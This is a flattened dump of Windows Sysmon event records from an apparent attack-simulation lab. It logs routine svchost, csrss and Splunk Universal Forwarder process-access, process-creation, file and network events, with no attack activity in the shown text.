10341000x800000000000000043808Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043807Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043806Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043805Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043804Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-1794-629A-0707-000000006002}3044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043803Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1794-629A-0707-000000006002}3044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043802Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.465{0A5DF930-1794-629A-0707-000000006002}3044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000193736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:48.036{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A187510F659FA24A9FE2F177CE4A2662,SHA256=30249B5154545023B497FEB797ADD77C2C50AAE73D1303D2A3DF14D872AC7A48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043831Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.854{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=7B79275E6007AC148F2521BBC9C2C697,SHA256=602642C9780F866A37BDE15C565C0C4C8D8CF4F9932DC17C82F4D97156EAB514,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000193738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:47.829{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56344-false10.0.1.12-8000- 23542300x8000000000000000193737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:49.067{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A04AC42221E41A490CDD6B07C9A5F22C,SHA256=B379E031BAF419E36E0356C25C63399824FD76B1A782FC1C62059A1D3DB91345,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043830Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1795-629A-0807-000000006002}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043829Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043828Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043827Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043826Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043825Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043824Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043823Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043822Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043821Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043820Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-1795-629A-0807-000000006002}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043819Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1795-629A-0807-000000006002}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043818Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.136{0A5DF930-1795-629A-0807-000000006002}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000193739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:50.086{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D0FD6AFB00EBA9818711292626CE3EE,SHA256=1E76DB375302B430F281E1201078F2E9400C4A55888223D912B58804DD00648E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043859Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1796-629A-0A07-000000006002}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043858Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043857Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043856Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:50.932{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043855Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 